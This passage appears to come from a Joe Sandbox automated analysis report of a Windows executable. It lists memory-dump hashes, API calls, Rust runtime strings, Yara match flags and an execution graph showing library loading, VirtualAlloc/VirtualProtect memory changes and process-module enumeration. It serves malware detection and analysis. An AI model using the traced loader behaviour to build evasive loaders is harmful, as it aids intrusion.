                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f5adfe35352926e57d6c1501e3f94ef3e08b4afb6c04930f220e50684487561
                                                      • Instruction ID: d045bda7254a6b5f6dbb2f9467f7f2098cf7c2d083c73bb6e0c8baa284e7395a
                                                      • Opcode Fuzzy Hash: 1f5adfe35352926e57d6c1501e3f94ef3e08b4afb6c04930f220e50684487561
                                                      • Instruction Fuzzy Hash: CED12622B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DA3AC4A5C764
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bc17a72bb4d65a3daaa96ea6a5e78534a2d2091f77ff49f54086504c6cd7c04
                                                      • Instruction ID: 55b94b8345f9716bf1dbfd21bd7e53c974c63fc33db06dd67b562861708b1fae
                                                      • Opcode Fuzzy Hash: 0bc17a72bb4d65a3daaa96ea6a5e78534a2d2091f77ff49f54086504c6cd7c04
                                                      • Instruction Fuzzy Hash: 20D12722B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DB3AC4A5C764
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41c2eed5ed49d8d8304f99a1a2baafa887ea0ec3a4d61a056b90c3e01f289024
                                                      • Instruction ID: 6eae3fc7843dc6f0690d4f3c58b5467d74d23b401cb9c01dcc1d5073b85197eb
                                                      • Opcode Fuzzy Hash: 41c2eed5ed49d8d8304f99a1a2baafa887ea0ec3a4d61a056b90c3e01f289024
                                                      • Instruction Fuzzy Hash: 8CD12622B586D249E7609AA0CC103BDFF61E714798F854233DE6E07BD8DB3AC4A5C764
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f79e8fad165e2b4da0af30f8301137aa012c4f85985be7609532e68ff664c8b
                                                      • Instruction ID: 49245d8e96ab8ee927283379133d3b9ddf4b1961c9b245c9fd66d4bc7b1cf70e
                                                      • Opcode Fuzzy Hash: 1f79e8fad165e2b4da0af30f8301137aa012c4f85985be7609532e68ff664c8b
                                                      • Instruction Fuzzy Hash: 6061AEB39041918BE7119F5AD85007EFB62F39A750FCA4237D78A13390CA3DB561CB28
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ce88e58a84799f193d4f806ce9da28b807984588694c007ab581a73cfeca41d
                                                      • Instruction ID: 14fed299e9a428fe4c2c353f548bbdf899812c330d0b9cfd8b41b0862fc3bdd3
                                                      • Opcode Fuzzy Hash: 5ce88e58a84799f193d4f806ce9da28b807984588694c007ab581a73cfeca41d
                                                      • Instruction Fuzzy Hash: 2341D32274578185EB25DEA59D502B9E720E768BC8B449827CE5F0BB48EE39E185C324
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                                                      • Instruction ID: fd9e870ac502411b762e4f495439ca00326b07b88585afd9cdad32c2116996d4
                                                      • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                                                      • Instruction Fuzzy Hash: BFF030352085159FDFA69F58C881EBA77E9EF0C754F444058FD05DB662D3B1ED209B80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2021999db2c8c4ddaef31ec3c98eae8a67e0ddccc3b8229d5b680a674f500f36
                                                      • Instruction ID: 03e0f6bb3b8d027702b6ba4cb6618c2fa08ff47f517a0d7805a836c3ab907c3f
                                                      • Opcode Fuzzy Hash: 2021999db2c8c4ddaef31ec3c98eae8a67e0ddccc3b8229d5b680a674f500f36
                                                      • Instruction Fuzzy Hash: 11A0012299980294EA44AB99AD91020E670FF58301B850072C05D462609E2EA644DB29
                                                      APIs
                                                      Strings
                                                      • internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF728777ED1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnvironmentVariable
                                                      • String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
                                                      • API String ID: 2691138088-50058851
                                                      • Opcode ID: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
                                                      • Instruction ID: 1bd738dce77cf9871eb1c316ea40d2a53498a86abbe46a6db66412ef9ec32ca0
                                                      • Opcode Fuzzy Hash: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
                                                      • Instruction Fuzzy Hash: D7810362A44AC185EB31AFA5DC443E8E365FB08BD8F844132DE5C5B795DF3D9281C728
                                                      APIs
                                                      Strings
                                                      • stack backtrace:, xrefs: 00007FF72877A7FF
                                                      • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 00007FF72877AAE2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
                                                      • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
                                                      • API String ID: 2744335978-2918537110
                                                      • Opcode ID: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
                                                      • Instruction ID: f104d2741966e895ff52243b824f4328295e6c5c62deb8888b409f594ede4db0
                                                      • Opcode Fuzzy Hash: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
                                                      • Instruction Fuzzy Hash: FCA15C22604FC18CEB719F61DC407EAB7A0FB0978DF84012ACA8D4BB99DF399255CB15
                                                      APIs
                                                      Strings
                                                      • internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF728777B8D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CurrentDirectory
                                                      • String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
                                                      • API String ID: 3993060814-50058851
                                                      • Opcode ID: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
                                                      • Instruction ID: 58d05672caeafdd6c3f9a145d16bc9f12c233d7412d66159e8ca314edcbe4ef7
                                                      • Opcode Fuzzy Hash: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
                                                      • Instruction Fuzzy Hash: 4751D062A84BC245E731AFA9AC443F9E254FB09BE8F844136DE6C17785DE3DA381C714
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: Handle$CloseConsoleErrorLastMode
                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                      • API String ID: 1170577072-2333694755
                                                      • Opcode ID: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
                                                      • Instruction ID: 1433b60e11880c2e3dc27daa07eb74a9de64c131a054327cf6f13ca39979b4eb
                                                      • Opcode Fuzzy Hash: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
                                                      • Instruction Fuzzy Hash: B481B461A4868288FB11ABA0EC403FDEB61EB18798F844133DE5D177D9DE7EE185C724
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 1956605914-0
                                                      • Opcode ID: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
                                                      • Instruction ID: 92814739246cf23019c2deee3311b39b7cb7eab1feb7f13b9fe1e3f128be349a
                                                      • Opcode Fuzzy Hash: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
                                                      • Instruction Fuzzy Hash: B5513961A4C65241F720AB90EC043BAEA51EF88790FD44137E99D43BD8DF7EE585CB24
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: SetThreadDescription$kernel32
                                                      • API String ID: 1646373207-1950310818
                                                      • Opcode ID: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
                                                      • Instruction ID: 91bdc792a21253d1bfe2fb88942cba3f8ce75a83aa8b812155e481d13a496458
                                                      • Opcode Fuzzy Hash: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
                                                      • Instruction Fuzzy Hash: D0F0A020B8A78681ED05AB86AC441A8E260EF0CFC1FC4443BC81D07360EE3DA145CB64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                                      • API String ID: 0-3513654867
                                                      • Opcode ID: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
                                                      • Instruction ID: 7bab81b0eab6294690554bf84833ffc87bda4138ccd1f19dd70a54046012d457
                                                      • Opcode Fuzzy Hash: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
                                                      • Instruction Fuzzy Hash: C3B1B122A49A4189EB21AFA0DC403BDF7A0EB58748FC44537DA4D07B94DF3EE455CB64

                                                      Execution Graph

                                                      Execution Coverage:3%
                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:74
                                                      Total number of Limit Nodes:6
                                                      execution_graph 15200 122a4921394 15201 122a49213b8 15200->15201 15202 122a49213c6 NtQuerySecurityObject 15201->15202 15203 122a433a434 VirtualAlloc 15204 122a433a450 15203->15204 15212 122a433a446 15203->15212 15205 122a433a54a LoadLibraryA 15204->15205 15206 122a433a583 15204->15206 15204->15212 15205->15204 15207 122a433a683 15206->15207 15206->15212 15213 122a433d964 LoadLibraryA 15206->15213 15207->15212 15233 122a433b9b1 15207->15233 15214 122a433a65b 15213->15214 15215 122a433d99d 15213->15215 15214->15212 15223 122a433db6b LoadLibraryA 15214->15223 15215->15214 15216 122a433d9f3 VirtualProtect 15215->15216 15216->15214 15217 122a433da1f 15216->15217 15218 122a433da38 VirtualProtect 15217->15218 15219 122a433da6a 15218->15219 15219->15214 15220 122a433daa4 VirtualProtect 15219->15220 15220->15214 15221 122a433dacd 15220->15221 15222 122a433dae6 VirtualProtect 15221->15222 15222->15214 15224 122a433dba4 15223->15224 15225 122a433db9a 15223->15225 15224->15225 15226 122a433dbfa VirtualProtect 15224->15226 15225->15207 15226->15225 15227 122a433dc26 15226->15227 15228 122a433dc3f VirtualProtect 15227->15228 15229 122a433dc71 15228->15229 15229->15225 15230 122a433dcab VirtualProtect 15229->15230 15230->15225 15231 122a433dcd4 15230->15231 15232 122a433dced VirtualProtect 15231->15232 15232->15225 15234 122a433bb39 15233->15234 15235 122a433bc08 VirtualAlloc 15234->15235 15236 122a433bc4d 15234->15236 15235->15236 15236->15212 15237 7ff63b54527c 15239 7ff63b545240 15237->15239 15238 7ff63b545243 EnumProcessModulesEx 15238->15239 15239->15237 15239->15238 15240 7ff63b5452b4 memset 15239->15240 15240->15239 15241 7ff63b543470 15244 7ff63b5456b0 CloseHandle 15241->15244 15243 7ff63b543498 15245 7ff63b5456d7 15244->15245 15246 7ff63b5456e0 GetLastError 15244->15246 15245->15243 15247 7ff63b54573c 15246->15247 15247->15243 15248 7ff63b544a10 15249 7ff63b544a46 15248->15249 15250 7ff63b544a5d CreateFileW 15249->15250 15252 7ff63b544aa7 15250->15252 15251 7ff63b544b14 15252->15251 15253 7ff63b544b58 GetLastError CloseHandle 15252->15253 15253->15251 15254 7ff63b55d164 15255 7ff63b55d17d 15254->15255 15256 7ff63b55d2bb 15255->15256 15257 7ff63b55d185 __scrt_acquire_startup_lock 15255->15257 15276 7ff63b55d6f0 IsProcessorFeaturePresent 15256->15276 15259 7ff63b55d2c5 15257->15259 15260 7ff63b55d1a3 __scrt_release_startup_lock 15257->15260 15261 7ff63b55d6f0 9 API calls 15259->15261 15263 7ff63b55d1c8 15260->15263 15265 7ff63b55d24e _get_initial_narrow_environment __p___argv __p___argc 15260->15265 15269 7ff63b55d246 _register_thread_local_exe_atexit_callback 15260->15269 15262 7ff63b55d2d0 15261->15262 15264 7ff63b55d2d8 _exit 15262->15264 15266 7ff63b543570 15265->15266 15267 7ff63b55d270 15266->15267 15274 7ff63b55d840 GetModuleHandleW 15267->15274 15269->15265 15271 7ff63b55d27b 15272 7ff63b55d285 15271->15272 15273 7ff63b55d280 _cexit 15271->15273 15272->15263 15273->15272 15275 7ff63b55d277 15274->15275 15275->15262 15275->15271 15277 7ff63b55d716 15276->15277 15278 7ff63b55d724 memset RtlCaptureContext RtlLookupFunctionEntry 15277->15278 15279 7ff63b55d79a memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15278->15279 15280 7ff63b55d75e RtlVirtualUnwind 15278->15280 15281 7ff63b55d81a 15279->15281 15280->15279 15281->15259

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252186094.00000122A4921000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000122A4921000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_122a4921000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: ObjectQuerySecurity
                                                      • String ID:
                                                      • API String ID: 718582247-0
                                                      • Opcode ID: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
                                                      • Instruction ID: 86b898a001e1c0b66af299c78302967eaf64543df454fd0e8b8a3113191363a6
                                                      • Opcode Fuzzy Hash: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
                                                      • Instruction Fuzzy Hash: E1F01470519B059FEB48EF28D85991ABBF1F7A8341F00892EE489D3271DF38D590CB82

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                      • String ID:
                                                      • API String ID: 1133592946-0
                                                      • Opcode ID: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
                                                      • Instruction ID: 8a01cdd2542bce5a9236ce9f2ce3bad7576a5ee221f81c13aca2cac1ca8eb0cd
                                                      • Opcode Fuzzy Hash: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
                                                      • Instruction Fuzzy Hash: 62313D23E0860742FA50BF65A451BB91351AF8D7A6F444036EACFC73F7DE6CE845A209

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                      • Instruction ID: 8d7aeb092de7804f8932d132c4f728446b0f7386709f8a12d142233bdd9371de
                                                      • Opcode Fuzzy Hash: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                      • Instruction Fuzzy Hash: 6451A730B1890E8FDF84EEACD884BAE73F5FBA8314F104695E419D7694DA74EA50CB41

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                      • Instruction ID: e76aff6ad45ae2d309a2db62e7957fc29384d186760282be5ba9009f1b6250a6
                                                      • Opcode Fuzzy Hash: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                      • Instruction Fuzzy Hash: 9B51E930B1890E8FDF84EEACD884BAE73F5FBA8314F104665E41AD7694DA74E950CB41

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
                                                      • Instruction ID: 4ac704b65d24a3bfbc0a64a3885b27542aef47353f051e695dfe0181b63a0c59
                                                      • Opcode Fuzzy Hash: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
                                                      • Instruction Fuzzy Hash: 5531CE32B04A0186FB608F65E444BAD6661BB887B8F144234EFED87BEADF7CD4518300

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
